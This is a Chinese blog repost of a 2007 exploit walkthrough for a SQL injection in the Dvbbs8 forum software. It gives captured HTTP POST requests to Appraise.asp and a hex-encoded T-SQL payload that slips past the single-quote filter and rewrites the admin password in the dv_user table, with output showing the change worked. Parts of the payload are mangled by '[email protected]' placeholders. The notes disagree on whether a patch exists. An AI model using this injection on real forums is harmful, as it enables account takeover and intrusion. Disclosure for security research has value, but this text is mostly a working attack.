Dvbbs8严重漏洞 's

admin

139803
文章

114
评论

2017年4月9日20:29:04评论338 views字数 3010阅读10分2秒阅读模式

摘要

鬼仔注：刚由黑板提醒，此漏洞已在上月修补过。来源：Allyesno's Blog
作者：Allyesno[AT]77169.org

鬼仔注：刚由黑板提醒，此漏洞已在上月修补过。

来源：Allyesno's Blog
作者：Allyesno[AT]77169.org

我这边已经假设好了一个DVBBS8 SQL：
我们先来注册一个用户，随便找个帖子。刚才弄坏了。。。。
我们来重新发个帖子。点发表评论，这里来抓包
POST /dvbbs8/Appraise.asp?action=save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://192.168.1.91/dvbbs8/dispbbs.asp?boardID=1&ID=2&page=1 Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322) Host: 192.168.1.91 Content-Length: 91 Connection: Keep-Alive Cache-Control: no-cache Cookie: DvForum=UserID=3&usercookies=0&StatUserID=197615644&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=allyesno&password=v0qdt2f765U6x7J5&userhidden=2; w0802=3; rtime=0; ltime=1186473801000; w08_eid=88452409-http%3A//192.168.1.91/dvbbs8/index.asp%3Fboardid%3D1; geturl=%2Fdvbbs8%2Fpost%5Fupload%2Easp%3Fboardid%3D1; ASPSESSIONIDACCRCQQQ=FDKDFDBAOGGEGNICMPBANLKL; Dvbbs=cacgffcf; upNum=0

boardid=1&topicid=2&announceid=2&atype=0&a1=0&a2=0&atitle=11111&acodestr=0425&acontent=test

OK，LET's start
LET's make fun
userpost是用户发表过的帖子数量。算错了

script language='javascript'> 
p>Microsoft OLE DB Provider for SQL Server 错误
'80040e14'
p>
font face="宋体" size=2>第 1 行: ';' 附近有语法错误。
p>
font face="宋体" size=2>/dvbbs8/inc/Dv_ClsMain.asp，行 1504

出现一个这个，不要管他，其实我们已经修改成功了！
文章：100
我们继续来修改，其实是这样的，程序有点小问题需要我们来解决
TopicID = Dvbbs.CheckStr(Request.Form("topicid"))

Public Function Checkstr(Str) If Isnull(Str) Then CheckStr = "" Exit Function End If Str = Replace(Str,Chr(0),"") CheckStr = Replace(Str,"'","''") End Function
很明显过滤了单引号。。。。我们这样来饶过
还是修改一下密码吧，现在ADMIN的密码是admin888，我们来把他修改成123456
[/code]
declare @a sysname
select @a=0x3400390062006100350039006100620062006500350036006500300035003700
update [dv_user] set [email protected] where userid=1
[/code]
这样可以修改成功！！！我们把他改回来
[email protected][email protected][email protected][email protected]+where+userid%3D1
OK，这句语句也可以执行
156
POST /dvbbs8/Appraise.asp?action=save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://192.168.1.91/dvbbs8/dispbbs.asp?boardID=1&ID=3&page=1 Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322) Host: 192.168.1.91 Content-Length: 242 Connection: Keep-Alive Cache-Control: no-cache Cookie: DvForum=UserID=3&usercookies=0&StatUserID=197615644&userclass=%C2%DB%CC%B3%D3%CE%C3%F1&username=allyesno&password=Y1tGx4j886XtB846&userhidden=2; List=list1=1; w0802=5; rtime=0; ltime=1186474916718; w08_eid=88452409-http%3A//192.168.1.91/dvbbs8/index.asp%3Fboardid%3D1; geturl=%2Fdvbbs8%2Fpost%5Fupload%2Easp%3Fboardid%3D1; ASPSESSIONIDACCRCQQQ=FDKDFDBAOGGEGNICMPBANLKL; Dvbbs=cacgffcf; upNum=0

[email protected][email protected][email protected][email protected][email protected]tr=3297&acontent=33
看见没，已经修改成了123456

由于漏洞比较严重，请大家谨慎使用，官方还未打补丁！！！！！！

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Dvbbs8严重漏洞 's

Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit

LBS 2.0.313 重要安全更新 [2007-07-03] 's

LBS blog又一注射漏洞含漏洞解析和exp 's

Penetration Testing 渗透测试 (11%) 's

bbsxp 2007[以前版本不知道]一个有意思的漏洞 's

bbsxp 2007斑竹权限注射 's

bbsxp 2007 注射漏洞 's

BBSXP7 mssql版，从注入到拿WEBSHELL 's

LBS 2.0.312 重要安全更新 [2007-06-29] 's

LBS blog sql注射漏洞[All version] 's

发表评论

在线咨询

微信